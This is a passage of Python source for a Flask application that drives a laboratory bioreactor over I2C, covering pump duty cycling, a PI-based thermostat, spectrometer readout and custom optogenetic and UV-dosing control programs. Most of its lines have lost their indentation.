if sysData[M]['present']==1:
pt1=str(I2CCom(M,'ThermometerIR',1,0,0x3C,0,1))
pt2=str(I2CCom(M,'ThermometerIR',1,0,0x3D,0,1))
pt3=str(I2CCom(M,'ThermometerIR',1,0,0x3E,0,1))
pt4=str(I2CCom(M,'ThermometerIR',1,0,0x3F,0,1))
ID = pt1+pt2+pt3+pt4
return ID
def addTerminal(M,strIn):
#Responsible for adding a new line to the terminal in the UI.
global sysData
now=datetime.now()
timeString=now.strftime("%Y-%m-%d %H:%M:%S ")
sysData[M]['Terminal']['text']=timeString + ' - ' + str(strIn) + '</br>' + sysData[M]['Terminal']['text']
@application.route("/ClearTerminal/<M>",methods=['POST'])
def clearTerminal(M):
#Deletes everything from the terminal.
global sysData
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
sysData[M]['Terminal']['text']=''
addTerminal(M,'Terminal Cleared')
return ('', 204)
@application.route("/SetFPMeasurement/<item>/<Excite>/<Base>/<Emit1>/<Emit2>/<Gain>",methods=['POST'])
def SetFPMeasurement(item,Excite,Base,Emit1,Emit2,Gain):
#Sets up the fluorescent protein measurement in terms of gain, and which LED / measurement bands to use.
FP=str(item)
Excite=str(Excite)
Base=str(Base)
Emit1=str(Emit1)
Emit2=str(Emit2)
Gain=str(Gain)
M=sysItems['UIDevice']
if sysData[M][FP]['ON']==1:
sysData[M][FP]['ON']=0
return ('', 204)
else:
sysData[M][FP]['ON']=1
sysData[M][FP]['LED']=Excite
sysData[M][FP]['BaseBand']=Base
sysData[M][FP]['Emit1Band']=Emit1
sysData[M][FP]['Emit2Band']=Emit2
sysData[M][FP]['Gain']=Gain
return ('', 204)
@application.route("/SetOutputTarget/<item>/<M>/<value>",methods=['POST'])
def SetOutputTarget(M,item, value):
#General function used to set the output level of a particular item, ensuring it is within an acceptable range.
global sysData
item = str(item)
value = float(value)
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
print(str(datetime.now()) + " Set item: " + str(item) + " to value " + str(value) + " on " + str(M))
if (value<sysData[M][item]['min']):
value=sysData[M][item]['min']
if (value>sysData[M][item]['max']):
value=sysData[M][item]['max']
sysData[M][item]['target']=value
if(sysData[M][item]['ON']==1 and not(item=='OD' or item=='Thermostat')): #Checking to see if our item is already running, in which case
SetOutputOn(M,item,0) #we turn it off and on again to restart at new rate.
SetOutputOn(M,item,1)
return ('', 204)
@application.route("/SetOutputOn/<item>/<force>/<M>",methods=['POST'])
def SetOutputOn(M,item,force):
#General function used to switch an output on or off.
global sysData
item = str(item)
force = int(force)
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
    #The first statements are to force it on or off if the command is called in force mode (force implies it sets it to a given state, regardless of what it is currently in)
if (force==1):
sysData[M][item]['ON']=1
SetOutput(M,item)
return ('', 204)
elif(force==0):
sysData[M][item]['ON']=0;
SetOutput(M,item)
return ('', 204)
    #Otherwise this is a toggle operation (i.e. it changes to the opposite of its current state)
if (sysData[M][item]['ON']==0):
sysData[M][item]['ON']=1
SetOutput(M,item)
return ('', 204)
else:
sysData[M][item]['ON']=0;
SetOutput(M,item)
return ('', 204)
def SetOutput(M,item):
#Here we actually do the digital communications required to set a given output. This function is called by SetOutputOn above as required.
global sysData
global sysItems
global sysDevices
M=str(M)
#We go through each different item and set it going as appropriate.
if(item=='Stir'):
#Stirring is initiated at a high speed for a couple of seconds to prevent the stir motor from stalling (e.g. if it is started at an initial power of 0.3)
if (sysData[M][item]['target']*float(sysData[M][item]['ON'])>0):
setPWM(M,'PWM',sysItems[item],1.0*float(sysData[M][item]['ON']),0) # This line is to just get stirring started briefly.
time.sleep(1.5)
if (sysData[M][item]['target']>0.4 and sysData[M][item]['ON']==1):
setPWM(M,'PWM',sysItems[item],0.5*float(sysData[M][item]['ON']),0) # This line is to just get stirring started briefly.
time.sleep(0.75)
if (sysData[M][item]['target']>0.8 and sysData[M][item]['ON']==1):
setPWM(M,'PWM',sysItems[item],0.7*float(sysData[M][item]['ON']),0) # This line is to just get stirring started briefly.
time.sleep(0.75)
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
elif(item=='Heat'):
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
elif(item=='UV'):
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
elif (item=='Thermostat'):
sysDevices[M][item]['thread']=Thread(target = Thermostat, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
elif (item=='Pump1' or item=='Pump2' or item=='Pump3' or item=='Pump4'):
if (sysData[M][item]['target']==0):
sysData[M][item]['ON']=0
sysDevices[M][item]['thread']=Thread(target = PumpModulation, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
elif (item=='OD'):
SetOutputOn(M,'Pump1',0)
SetOutputOn(M,'Pump2',0) #We turn pumps off when we switch OD state
elif (item=='Zigzag'):
sysData[M]['Zigzag']['target']=5.0
sysData[M]['Zigzag']['SwitchPoint']=sysData[M]['Experiment']['cycles']
elif (item=='LEDA' or item=='LEDB' or item=='LEDC' or item=='LEDD' or item=='LEDE' or item=='LEDF' or item=='LEDG'):
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
else: #This is if we are setting the DAC. All should be in range [0,1]
register = int(sysItems['DAC'][item],2)
value=sysData[M][item]['target']*float(sysData[M][item]['ON'])
if (value==0):
value=0
else:
value=(value+0.00)/1.00
sf=0.303 #This factor is scaling down the maximum voltage being fed to the laser, preventing its photodiode current (and hence optical power) being too large.
value=value*sf
binaryValue=bin(int(value*4095.9)) #Bit of a dodgy method for ensuring we get an integer in [0,4095]
toWrite=str(binaryValue[2:].zfill(16))
toWrite1=int(toWrite[0:8],2)
toWrite2=int(toWrite[8:16],2)
I2CCom(M,'DAC',0,8,toWrite1,toWrite2,0)
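#Illustrative sketch, not called by the application: the DAC branch above maps a target
#in [0,1] through the laser-safety scale factor to a 12-bit code, then splits that code
#into the two bytes written over I2C. The helper below is an assumed, equivalent form of
#that packing, added only for clarity.
def _dac_code_sketch(target,on=1.0,sf=0.303):
    value=max(0.0,min(1.0,target*float(on)))*sf #Clamp to [0,1] and apply the scale factor, as above.
    code=int(value*4095.9) #Integer in [0,4095].
    byte1=(code>>8)&0xFF #Equivalent of toWrite1 above (top bits of the zero-padded 16-bit string).
    byte2=code&0xFF #Equivalent of toWrite2 above (bottom 8 bits).
    return byte1,byte2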
def PumpModulation(M,item):
    #Responsible for turning pumps on/off with an appropriate duty cycle. They are turned on for a fraction of each ~1 minute cycle to achieve low pump rates.
global sysData
global sysItems
global sysDevices
sysDevices[M][item]['threadCount']=(sysDevices[M][item]['threadCount']+1)%100 #Index of the particular thread running.
currentThread=sysDevices[M][item]['threadCount']
    while (sysDevices[M][item]['active']==1): #Idea is we will wait here if a previous thread on this pump is already running. Potentially all this 'active' business could be removed from this function.
time.sleep(0.02)
if (abs(sysData[M][item]['target']*sysData[M][item]['ON'])!=1 and currentThread==sysDevices[M][item]['threadCount']): #In all cases we turn things off to begin
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
if (sysData[M][item]['ON']==0):
return
Time1=datetime.now()
cycletime=sysData[M]['Experiment']['cycleTime']*1.05 #We make this marginally longer than the experiment cycle time to avoid too much chaos when you come back around to pumping again.
Ontime=cycletime*abs(sysData[M][item]['target'])
# Decided to remove the below section in order to prevent media buildup in the device if you are pumping in very rapidly. This check means that media is removed, then added. Removing this code means these happen simultaneously.
#if (item=="Pump1" and abs(sysData[M][item]['target'])<0.3): #Ensuring we run Pump1 after Pump2.
# waittime=cycletime*abs(sysData[M]['Pump2']['target']) #We want to wait until the output pump has stopped, otherwise you are very inefficient with your media since it will be pumping out the fresh media fromthe top of the test tube right when it enters.
# time.sleep(waittime+1.0)
if (sysData[M][item]['target']>0 and currentThread==sysDevices[M][item]['threadCount']): #Turning on pumps in forward direction
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],1.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
elif (sysData[M][item]['target']<0 and currentThread==sysDevices[M][item]['threadCount']): #Or backward direction.
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],1.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
time.sleep(Ontime)
if(abs(sysData[M][item]['target'])!=1 and currentThread==sysDevices[M][item]['threadCount']): #Turning off pumps at appropriate time.
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
Time2=datetime.now()
elapsedTime=Time2-Time1
elapsedTimeSeconds=round(elapsedTime.total_seconds(),2)
Offtime=cycletime-elapsedTimeSeconds
if (Offtime>0.0):
time.sleep(Offtime)
if (sysData[M][item]['ON']==1 and sysDevices[M][item]['threadCount']==currentThread): #If pumps need to keep going, this starts a new pump thread.
sysDevices[M][item]['thread']=Thread(target = PumpModulation, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
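#Illustrative sketch, not used by the application: PumpModulation above realises low
#average flow rates as a duty cycle over one experiment cycle. Ignoring the I2C and
#timing overheads that the real code measures, the on/off split it aims for is:
def _pump_duty_sketch(target,experiment_cycle_time):
    cycletime=experiment_cycle_time*1.05 #Marginally longer than the experiment cycle, as above.
    on_time=cycletime*abs(target) #Fraction of the cycle spent pumping.
    off_time=max(0.0,cycletime-on_time) #Remainder of the cycle.
    return on_time,off_time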
def Thermostat(M,item):
    #Function that implements thermostat temperature control using a combined MPC and PI algorithm.
global sysData
global sysItems
global sysDevices
ON=sysData[M][item]['ON']
sysDevices[M][item]['threadCount']=(sysDevices[M][item]['threadCount']+1)%100
currentThread=sysDevices[M][item]['threadCount']
if (ON==0):
SetOutputOn(M,'Heat',0)
return
MeasureTemp(M,'IR') #Measures temperature - note that this may be happening DURING stirring.
CurrentTemp=sysData[M]['ThermometerIR']['current']
TargetTemp=sysData[M]['Thermostat']['target']
LastTemp=sysData[M]['Thermostat']['last']
#MPC Controller Component
MediaTemp=sysData[M]['ThermometerExternal']['current']
MPC=0
if (MediaTemp>0.0):
Tdiff=CurrentTemp-MediaTemp
Pumping=sysData[M]['Pump1']['target']*float(sysData[M]['Pump1']['ON'])*float(sysData[M]['OD']['ON'])
Gain=2.5
MPC=Gain*Tdiff*Pumping
#PI Controller Component
e=TargetTemp-CurrentTemp
dt=sysData[M]['Thermostat']['cycleTime']
I=sysData[M]['Thermostat']['Integral']
if (abs(e)<2.0):
I=I+0.0005*dt*e
P=0.25*e
else:
P=0.5*e;
if (abs(TargetTemp-LastTemp)>2.0): #This resets integrator if we make a big jump in set point.
I=0.0
elif(I<0.0):
I=0.0
elif (I>1.0):
I=1.0
sysData[M]['Thermostat']['Integral']=I
U=P+I+MPC
if(U>1.0):
U=1.0
sysData[M]['Heat']['target']=U
sysData[M]['Heat']['ON']=1
elif(U<0):
U=0
sysData[M]['Heat']['target']=U
sysData[M]['Heat']['ON']=0
else:
sysData[M]['Heat']['target']=U
sysData[M]['Heat']['ON']=1
sysData[M]['Thermostat']['last']=sysData[M]['Thermostat']['target']
SetOutput(M,'Heat')
time.sleep(dt)
if (sysData[M][item]['ON']==1 and sysDevices[M][item]['threadCount']==currentThread):
sysDevices[M][item]['thread']=Thread(target = Thermostat, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
else:
sysData[M]['Heat']['ON']=0
sysData[M]['Heat']['target']=0
SetOutput(M,'Heat')
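#Illustrative sketch, not called by the application: the heater command computed above
#is U = P + I + MPC, where P and I form a PI controller on the temperature error and MPC
#is a feedforward term compensating for cold media being pumped in. One update with the
#same gains (omitting the setpoint-jump integrator reset) looks like this:
def _thermostat_update_sketch(target,current,media_temp,pumping,integral,dt):
    e=target-current
    mpc=2.5*(current-media_temp)*pumping if media_temp>0.0 else 0.0 #Feedforward for media inflow.
    if (abs(e)<2.0):
        integral=min(1.0,max(0.0,integral+0.0005*dt*e)) #Slow integral term, clamped to [0,1] as above.
        p=0.25*e
    else:
        p=0.5*e
    u=max(0.0,min(1.0,p+integral+mpc)) #Heater duty in [0,1].
    return u,integral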
@application.route("/Direction/<item>/<M>",methods=['POST'])
def direction(M,item):
#Flips direction of a pump.
global sysData
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
sysData[M][item]['target']=-1.0*sysData[M][item]['target']
if (sysData[M]['OD']['ON']==1):
sysData[M][item]['direction']=-1.0*sysData[M][item]['direction']
return ('', 204)
def AS7341Read(M,Gain,ISteps,reset):
#Responsible for reading data from the spectrometer.
global sysItems
global sysData
reset=int(reset)
ISteps=int(ISteps)
if ISteps>255:
ISteps=255 #255 steps is approx 0.71 seconds.
elif (ISteps<0):
ISteps=0
if Gain>10:
Gain=10 #512x
elif (Gain<0):
Gain=0 #0.5x
    I2CCom(M,'AS7341',0,8,int(0xA9),int(0x04),0) #This sets us into BANK mode 0, for accessing registers 0x80+. The 4 means we have WTIMEx16
if (reset==1):
I2CCom(M,'AS7341',0,8,int(0x80),int(0x00),0) #Turns power down
time.sleep(0.01)
I2CCom(M,'AS7341',0,8,int(0x80),int(0x01),0) #Turns power on with spectral measurement disabled
else:
I2CCom(M,'AS7341',0,8,int(0x80),int(0x01),0) #Turns power on with spectral measurement disabled
I2CCom(M,'AS7341',0,8,int(0xAF),int(0x10),0) #Tells it we are going to now write SMUX configuration to RAM
#I2CCom(M,'AS7341',0,100,int(0x00),int(0x00),0) #Forces AS7341SMUX to run since length is 100.
AS7341SMUX(M,'AS7341',0,0)
    I2CCom(M,'AS7341',0,8,int(0x80),int(0x11),0) #Runs SMUX command (i.e. configures SMUX with data from RAM)
time.sleep(0.001)
I2CCom(M,'AS7341',0,8,int(0x81),ISteps,0) #Sets number of integration steps of length 2.78ms Max ISteps is 255
    I2CCom(M,'AS7341',0,8,int(0x83),0xFF,0) #Sets maximum wait time of 0.7ms (multiplied by 16 due to WLONG)
    I2CCom(M,'AS7341',0,8,int(0xAA),Gain,0) #Sets gain on ADCs. Gain can take integer values from 0 (0.5x) to 10 (512x).
#I2CCom(M,'AS7341',0,8,int(0xA9),int(0x14),0) #This sets us into BANK mode 1, for accessing 0x60 to 0x74. The 4 means we have WTIMEx16
#I2CCom(M,'AS7341',0,8,int(0x70),int(0x00),0) #Sets integration mode SPM (normal mode)
#Above is default of 0x70!
I2CCom(M,'AS7341',0,8,int(0x80),int(0x0B),0) #Starts spectral measurement, with WEN (wait between measurements feature) enabled.
time.sleep((ISteps+1)*0.0028 + 0.2) #Wait whilst integration is done and results are processed.
ASTATUS=int(I2CCom(M,'AS7341',1,8,0x94,0x00,0)) #Get measurement status, including saturation details.
C0_L=int(I2CCom(M,'AS7341',1,8,0x95,0x00,0))
C0_H=int(I2CCom(M,'AS7341',1,8,0x96,0x00,0))
C1_L=int(I2CCom(M,'AS7341',1,8,0x97,0x00,0))
C1_H=int(I2CCom(M,'AS7341',1,8,0x98,0x00,0))
C2_L=int(I2CCom(M,'AS7341',1,8,0x99,0x00,0))
C2_H=int(I2CCom(M,'AS7341',1,8,0x9A,0x00,0))
C3_L=int(I2CCom(M,'AS7341',1,8,0x9B,0x00,0))
C3_H=int(I2CCom(M,'AS7341',1,8,0x9C,0x00,0))
C4_L=int(I2CCom(M,'AS7341',1,8,0x9D,0x00,0))
C4_H=int(I2CCom(M,'AS7341',1,8,0x9E,0x00,0))
C5_L=int(I2CCom(M,'AS7341',1,8,0x9F,0x00,0))
C5_H=int(I2CCom(M,'AS7341',1,8,0xA0,0x00,0))
I2CCom(M,'AS7341',0,8,int(0x80),int(0x01),0) #Stops spectral measurement, leaves power on.
    #Status2=int(I2CCom(M,'AS7341',1,8,0xA3,0x00,0)) #Reads system status at end of spectral measurement.
#print(str(ASTATUS))
#print(str(Status2))
sysData[M]['AS7341']['current']['ADC0']=int(bin(C0_H)[2:].zfill(8)+bin(C0_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC1']=int(bin(C1_H)[2:].zfill(8)+bin(C1_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC2']=int(bin(C2_H)[2:].zfill(8)+bin(C2_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC3']=int(bin(C3_H)[2:].zfill(8)+bin(C3_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC4']=int(bin(C4_H)[2:].zfill(8)+bin(C4_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC5']=int(bin(C5_H)[2:].zfill(8)+bin(C5_L)[2:].zfill(8),2)
if (sysData[M]['AS7341']['current']['ADC0']==65535 or sysData[M]['AS7341']['current']['ADC1']==65535 or sysData[M]['AS7341']['current']['ADC2']==65535 or sysData[M]['AS7341']['current']['ADC3']==65535 or sysData[M]['AS7341']['current']['ADC4']==65535 or sysData[M]['AS7341']['current']['ADC5']==65535 ):
print(str(datetime.now()) + ' Spectrometer measurement was saturated on device ' + str(M)) #Not sure if this saturation check above actually works correctly...
return 0
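#Illustrative sketch, not called anywhere: each 16-bit channel count above is rebuilt
#from its low and high bytes via binary strings; the bitwise equivalent is simply:
def _adc_count_sketch(low_byte,high_byte):
    return (high_byte<<8)|low_byte #Same value as int(bin(high)[2:].zfill(8)+bin(low)[2:].zfill(8),2)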
def AS7341SMUX(M,device,data1,data2):
    #Sets up the ADC multiplexer on the spectrometer, which is responsible for connecting photodiodes to the amplifier/ADC circuits within the device.
    #The spectrometer has only 6 ADCs but more than 6 photodiode channels, hence you need to select a subset of photodiodes to measure with each shot. The relative gain does change slightly (1-2%) between ADCs.
global sysItems
global sysData
global sysDevices
M=str(M)
Addresses=['0x00','0x01','0x02','0x03','0x04','0x05','0x06','0x07','0x08','0x0A','0x0B','0x0C','0x0D','0x0E','0x0F','0x10','0x11','0x12']
for a in Addresses:
A=sysItems['AS7341'][a]['A']
B=sysItems['AS7341'][a]['B']
if (A!='U'):
As=sysData[M]['AS7341']['channels'][A]
else:
As=0
if (B!='U'):
Bs=sysData[M]['AS7341']['channels'][B]
else:
Bs=0
Ab=str(bin(As))[2:].zfill(4)
Bb=str(bin(Bs))[2:].zfill(4)
C=Ab+Bb
#time.sleep(0.001) #Added this to remove errors where beaglebone crashed!
        I2CCom(M,'AS7341',0,8,int(a,16),int(C,2),0) #Writes this register pair's SMUX configuration byte to RAM
#sysDevices[M][device]['device'].write8(int(a,16),int(C,2))
@application.route("/GetSpectrum/<Gain>/<M>",methods=['POST'])
def GetSpectrum(M,Gain):
#Measures entire spectrum, i.e. every different photodiode, which requires 2 measurement shots.
Gain=int(Gain[1:])
global sysData
global sysItems
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
out=GetLight(M,['nm410','nm440','nm470','nm510','nm550','nm583'],Gain,255)
out2=GetLight(M,['nm620', 'nm670','CLEAR','NIR','DARK'],Gain,255)
sysData[M]['AS7341']['spectrum']['nm410']=out[0]
sysData[M]['AS7341']['spectrum']['nm440']=out[1]
sysData[M]['AS7341']['spectrum']['nm470']=out[2]
sysData[M]['AS7341']['spectrum']['nm510']=out[3]
sysData[M]['AS7341']['spectrum']['nm550']=out[4]
sysData[M]['AS7341']['spectrum']['nm583']=out[5]
sysData[M]['AS7341']['spectrum']['nm620']=out2[0]
sysData[M]['AS7341']['spectrum']['nm670']=out2[1]
sysData[M]['AS7341']['spectrum']['CLEAR']=out2[2]
sysData[M]['AS7341']['spectrum']['NIR']=out2[3]
return ('', 204)
def GetLight(M,wavelengths,Gain,ISteps):
#Runs spectrometer measurement and puts data into appropriate structure.
global sysData
M=str(M)
channels=['nm410','nm440','nm470','nm510','nm550','nm583','nm620', 'nm670','CLEAR','NIR','DARK','ExtGPIO', 'ExtINT' , 'FLICKER']
for channel in channels:
sysData[M]['AS7341']['channels'][channel]=0 #First we set all measurement ADC indexes to zero.
index=1;
for wavelength in wavelengths:
if wavelength != "OFF":
sysData[M]['AS7341']['channels'][wavelength]=index #Now assign ADCs to each of the channel where needed.
index=index+1
success=0
while success<2:
try:
AS7341Read(M,Gain,ISteps,success)
success=2
except:
print(str(datetime.now()) + 'AS7341 measurement failed on ' + str(M))
success=success+1
if success==2:
print(str(datetime.now()) + 'AS7341 measurement failed twice on ' + str(M) + ', setting unity values')
sysData[M]['AS7341']['current']['ADC0']=1
DACS=['ADC1', 'ADC2', 'ADC3', 'ADC4', 'ADC5']
for DAC in DACS:
sysData[M]['AS7341']['current'][DAC]=0
output=[0.0,0.0,0.0,0.0,0.0,0.0]
index=0
DACS=['ADC0', 'ADC1', 'ADC2', 'ADC3', 'ADC4', 'ADC5']
for wavelength in wavelengths:
if wavelength != "OFF":
output[index]=sysData[M]['AS7341']['current'][DACS[index]]
index=index+1
return output
def GetTransmission(M,item,wavelengths,Gain,ISteps):
#Gets light transmission through sample by turning on light, measuring, turning off light.
global sysData
M=str(M)
SetOutputOn(M,item,1)
output=GetLight(M,wavelengths,Gain,ISteps)
SetOutputOn(M,item,0)
return output
@application.route("/SetCustom/<Program>/<Status>",methods=['POST'])
def SetCustom(Program,Status):
#Turns a custom program on/off.
global sysData
M=sysItems['UIDevice']
item="Custom"
if sysData[M][item]['ON']==1:
sysData[M][item]['ON']=0
else:
sysData[M][item]['Program']=str(Program)
sysData[M][item]['Status']=float(Status)
sysData[M][item]['ON']=1
        sysData[M][item]['param1']=0.0 #These parameters get reset each time you restart your program.
sysData[M][item]['param2']=0.0
sysData[M][item]['param3']=0.0
return('',204)
def CustomProgram(M):
#Runs a custom program, some examples are included. You can remove/edit this function as you see fit.
    #Note that the custom programs (as set up at present) use an external .csv file with input parameters. This is done to allow these parameters to easily be varied on the fly.
global sysData
M=str(M)
program=sysData[M]['Custom']['Program']
#Subsequent few lines reads in external parameters from a file if you are using any.
fname='InputParameters_' + str(M)+'.csv'
with open(fname, 'rb') as f:
reader = csv.reader(f)
listin = list(reader)
Params=listin[0]
addTerminal(M,'Running Program = ' + str(program) + ' on device ' + str(M))
if (program=="C1"): #Optogenetic Integral Control Program
integral=0.0 #Integral in integral controller
green=0.0 #Intensity of Green actuation
red=0.0 #Intensity of red actuation.
GFPNow=sysData[M]['FP1']['Emit1']
GFPTarget=sysData[M]['Custom']['Status'] #This is the controller setpoint.
error=GFPTarget-GFPNow
if error>0.0075:
green=1.0
red=0.0
sysData[M]['Custom']['param3']=0.0
elif error<-0.0075:
green=0.0
red=1.0
sysData[M]['Custom']['param3']=0.0
else:
red=1.0
balance=float(Params[0]) #our guess at green light level to get 50% expression.
KI=float(Params[1])
KP=float(Params[2])
integral=sysData[M]['Custom']['param3']+error*KI
green=balance+KP*error+integral
sysData[M]['Custom']['param3']=integral
GreenThread=Thread(target = CustomLEDCycle, args=(M,'LEDD',green))
GreenThread.setDaemon(True)
GreenThread.start();
RedThread=Thread(target = CustomLEDCycle, args=(M,'LEDF',red))
RedThread.setDaemon(True)
RedThread.start();
sysData[M]['Custom']['param1']=green
sysData[M]['Custom']['param2']=red
addTerminal(M,'Program = ' + str(program) + ' green= ' + str(green)+ ' red= ' + str(red) + ' integral= ' + str(integral))
elif (program=="C2"): #UV Integral Control Program
integral=0.0 #Integral in integral controller
UV=0.0 #Intensity of Green actuation
GrowthRate=sysData[M]['GrowthRate']['current']
GrowthTarget=sysData[M]['Custom']['Status'] #This is the controller setpoint.
error=GrowthTarget-GrowthRate
KP=float(Params[0]) #Past data suggest value of ~0.005
KI=float(Params[1]) #Past data suggest value of ~2e-5
integral=sysData[M]['Custom']['param2']+error*KI
if(integral>0):
integral=0.0
sysData[M]['Custom']['param2']=integral
UV=-1.0*(KP*error+integral)
sysData[M]['Custom']['param1']=UV
SetOutputTarget(M,'UV',UV)
SetOutputOn(M,'UV',1)
addTerminal(M,'Program = ' + str(program) + ' UV= ' + str(UV)+ ' integral= ' + str(integral))
elif (program=="C3"): #UV Integral Control Program Mk 2
integral=sysData[M]['Custom']['param2'] #Integral in integral controller
integral2=sysData[M]['Custom']['param3'] #Second integral controller
UV=0.0 #Intensity of UV
GrowthRate=sysData[M]['GrowthRate']['current']
GrowthTarget=sysData[M]['Custom']['Status'] #This is the controller setpoint.
error=GrowthTarget-GrowthRate
KP=float(Params[0]) #Past data suggest value of ~0.005
KI=float(Params[1]) #Past data suggest value of ~2e-5
KI2=float(Params[2])
integral=sysData[M]['Custom']['param2']+error*KI
if(integral>0):
integral=0.0
if(abs(error)<0.3): #This is a second high-gain integrator which only gets cranking along when we are close to the target.
integral2=sysData[M]['Custom']['param3']+error*KI2
if(integral2>0):
integral2=0.0
sysData[M]['Custom']['param2']=integral
sysData[M]['Custom']['param3']=integral2
UV=-1.0*(KP*error+integral+integral2)
m=50.0
UV=(1.0/m)*(math.exp(m*UV)-1.0) #Basically this is to force the UV level to increase exponentially!
sysData[M]['Custom']['param1']=UV
SetOutputTarget(M,'UV',UV)
SetOutputOn(M,'UV',1)
addTerminal(M,'Program = ' + str(program) + ' UV= ' + str(UV)+ ' integral= ' + str(integral))
elif (program=="C4"): #UV Integral Control Program Mk 4
rategain=float(Params[0])
timept=sysData[M]['Custom']['Status'] #This is the timestep as we follow in minutes
        UV=0.001*math.exp(timept*rategain) #So we just exponentially increase UV over time!
sysData[M]['Custom']['param1']=UV
SetOutputTarget(M,'UV',UV)
SetOutputOn(M,'UV',1)
timept=timept+1
sysData[M]['Custom']['Status']=timept
elif (program=="C5"): #UV Dosing program
timept=int(sysData[M]['Custom']['Status']) #This is the timestep as we follow in minutes
sysData[M]['Custom']['Status']=timept+1 #Increment time as we have entered the loop another time!
Pump2Ontime=sysData[M]['Experiment']['cycleTime']*1.05*abs(sysData[M]['Pump2']['target'])*sysData[M]['Pump2']['ON']+0.5 #The amount of time Pump2 is going to be on for following RegulateOD above.
time.sleep(Pump2Ontime) #Pause here is to prevent output pumping happening at the same time as stirring.
timelength=300 #Time between doses in minutes
if(timept%timelength==2): #So this happens every 5 hours!
iters=(timept//timelength)
Dose0=float(Params[0])
            Dose=Dose0*(2.0**float(iters)) #UV Dose, in terms of the amount of time the UV should be left on at 1.0 intensity.
print(str(datetime.now()) + ' Gave dose ' + str(Dose) + " at iteration " + str(iters) + " on device " + str(M))
if (Dose<30.0):
powerlvl=Dose/30.0
SetOutputTarget(M,'UV',powerlvl)
Dose=30.0
else:
                SetOutputTarget(M,'UV',1.0) #Ensure UV is on at appropriate intensity
SetOutputOn(M,'UV',1) #Activate UV
time.sleep(Dose) #Wait for dose to be administered
SetOutputOn(M,'UV',0) #Deactivate UV
elif (program=="C6"): #UV Dosing program 2 - constant value!
timept=int(sysData[M]['Custom']['Status']) #This is the timestep as we follow in minutes
sysData[M]['Custom']['Status']=timept+1 #Increment time as we have entered the loop another time!
Pump2Ontime=sysData[M]['Experiment']['cycleTime']*1.05*abs(sysData[M]['Pump2']['target'])*sysData[M]['Pump2']['ON']+0.5 #The amount of time Pump2 is going to be on for following RegulateOD above.
time.sleep(Pump2Ontime) #Pause here is to prevent output pumping happening at the same time as stirring.
timelength=300 #Time between doses in minutes
if(timept%timelength==2): #So this happens every 5 hours!
iters=(timept//timelength)
if iters>3:
iters=3
Dose0=float(Params[0])
            Dose=Dose0*(2.0**float(iters)) #UV Dose, in terms of the amount of time the UV should be left on at 1.0 intensity.
print(str(datetime.now()) + ' Gave dose ' + str(Dose) + " at iteration " + str(iters) + " on device " + str(M))
if (Dose<30.0):
powerlvl=Dose/30.0
SetOutputTarget(M,'UV',powerlvl)
Dose=30.0
else:
                SetOutputTarget(M,'UV',1.0) #Ensure UV is on at appropriate intensity
SetOutputOn(M,'UV',1) #Activate UV
time.sleep(Dose) #Wait for dose to be administered
SetOutputOn(M,'UV',0) #Deactivate UV
return
def CustomLEDCycle(M,LED,Value):
#This function cycles LEDs for a fraction of 30 seconds during an experiment.
global sysData
M=str(M)
if (Value>1.0):
Value=1.0
if (Value>0.0):
SetOutputOn(M,LED,1)
time.sleep(Value*30.0)#Sleep whatever fraction of 30 seconds we are interested in
SetOutputOn(M,LED,0)
return
@application.route("/SetLightActuation/<Excite>",methods=['POST'])
def SetLightActuation(Excite):
#Basic function used to set which LED is used for optogenetics.
global sysData
M=sysItems['UIDevice']
item="Light"
if sysData[M][item]['ON']==1:
sysData[M][item]['ON']=0
return ('', 204)
else:
sysData[M][item]['Excite']=str(Excite)
sysData[M][item]['ON']=1
return('',204)
def LightActuation(M,toggle):
#Another optogenetic function, turning LEDs on/off during experiment as appropriate.
global sysData
M=str(M)
toggle=int(toggle)
LEDChoice=sysData[M]['Light']['Excite']
if (toggle==1 and sysData[M]['Light']['ON']==1):
SetOutputOn(M,LEDChoice,1)
else:
SetOutputOn(M,LEDChoice,0)
return 0
@application.route("/CharacteriseDevice/<M>/<Program>",methods=['POST'])
